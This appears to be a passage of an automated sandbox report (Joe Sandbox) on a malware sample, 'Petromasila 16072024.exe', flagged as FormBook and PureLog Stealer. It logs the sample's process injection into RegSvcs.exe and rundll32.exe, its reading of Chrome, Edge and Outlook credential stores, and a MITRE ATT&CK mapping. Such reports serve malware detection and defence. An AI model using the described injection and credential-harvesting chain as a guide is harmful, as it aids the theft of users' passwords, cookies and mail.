Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\rundll32.exe

Thread register set: target process: 476

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\rundll32.exe

Thread APC queued: target process: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A2A008	Jump to behavior

Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Program Files (x86)\SPTehEUlWDxBWioImwPONQYKIylAhuwexbbDYlJpnZjSLwNWaoFfvX\udkVsCOVUH.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: udkVsCOVUH.exe, 00000005.00000000.67681599156.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, udkVsCOVUH.exe, 00000005.00000002.72355143568.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, udkVsCOVUH.exe, 00000007.00000000.67905208537.0000000001B30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: udkVsCOVUH.exe, 00000005.00000000.67681599156.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, udkVsCOVUH.exe, 00000005.00000002.72355143568.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, udkVsCOVUH.exe, 00000007.00000000.67905208537.0000000001B30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: udkVsCOVUH.exe, 00000005.00000000.67681599156.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, udkVsCOVUH.exe, 00000005.00000002.72355143568.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, udkVsCOVUH.exe, 00000007.00000000.67905208537.0000000001B30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: udkVsCOVUH.exe, 00000005.00000000.67681599156.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, udkVsCOVUH.exe, 00000005.00000002.72355143568.0000000001A30000.00000002.00000001.00040000.00000000.sdmp, udkVsCOVUH.exe, 00000007.00000000.67905208537.0000000001B30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Queries volume information: C:\Users\user\Desktop\Petromasila 16072024.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\Petromasila 16072024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.67761026249.00000000016A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.72354462859.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.72354109038.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.67758522682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.72355680444.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.72355583181.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.67761207375.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Petromasila 16072024.exe.26d6fbc.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Petromasila 16072024.exe.6b50000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Petromasila 16072024.exe.6b50000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Petromasila 16072024.exe.26d6fbc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.67398967466.0000000006B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.67394861728.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.67761026249.00000000016A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.72354462859.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.72354109038.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.67758522682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.72355680444.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.72355583181.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.67761207375.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Petromasila 16072024.exe.26d6fbc.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Petromasila 16072024.exe.6b50000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Petromasila 16072024.exe.6b50000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Petromasila 16072024.exe.26d6fbc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.67398967466.0000000006B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.67394861728.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	612 Process Injection	1 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	5 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	612 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Rundll32	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	22 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Petromasila 16072024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Petromasila 16072024.exe